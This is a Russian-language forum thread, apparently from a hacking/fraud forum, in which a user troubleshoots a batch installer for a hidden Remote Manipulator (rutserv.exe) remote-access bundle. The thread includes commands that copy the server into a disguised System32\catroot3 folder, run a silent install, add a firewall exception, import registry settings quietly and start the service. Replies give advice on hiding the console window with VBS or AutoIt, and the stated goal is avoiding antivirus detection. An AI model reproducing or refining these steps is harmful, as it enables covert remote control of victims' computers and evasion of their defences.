1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

bat файл не хочет работать, в чем дело?

Тема в разделе "Помощь по всем вопросам.", создана пользователем bake01, 27 май 2015.

  1. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    Всем привет. Собираю сборку рмс, При запуске install.bat почему то не копируються файлы и не запускаеться. Когда install.bat конвентирую в install.exe все отклично работает. Но exe палиться. Использовал bat to exe convekter 1.5.1.

    В чем дело? Как решить этот вопрос?
     
    Метки:
  2. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.681
    Симпатии:
    2.274
    может дело в правах ?
     
    • Like Like x 1
    • Agree Agree x 1
  3. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    пути до файлов в кавычки двойные возьми.
     
  4. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    С правами вроде все хорошо вроде.
    Путь такой copy /y "rutserv.exe" "%SYSTEMROOT%\System32\catroot3\rutserv.exe"

    я тут покапался немного... когда запускаю exe он комирует файлы в 2 места

    1 который я указал %SYSTEMROOT%\System32\catroot3\
    2 C:\Windows\SysWOW64\catroot3

    а сами сервер запускаеться с SysWOW64. Наверное у меня винда 64 бита из-за этого.

    а когда запускаю bat копирует только в System32 и выходит ошибка не может запустить.

    Что можно сделать?
     
  5. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    писать и под 32, и 64
     
    • Like Like x 2
  6. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    Пока не знаю как писать это. Сейчас указал на диск С:\1 вроде стабильно работает попробую еще на других компах.
    bat файл показывает свое окно. Вроде стоит @echo off как небудь можно его скрыть?
     
  7. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    параметрами запуска из других файлов. например vbs
     
  8. K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    вместо бата напиши на ауто ит, или на вбс
     
    • Like Like x 1
  9. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    UAC конечно все портит раза 4 выходит. разрешение засунуть в реестор, а разрешение запуска главного exe 3 раза

    "rutserv.exe" /silentinstall
    "rutserv.exe" /firewall
    regedit /s set.reg
    "rutserv.exe" /start
     

Поделиться этой страницей

Загрузка...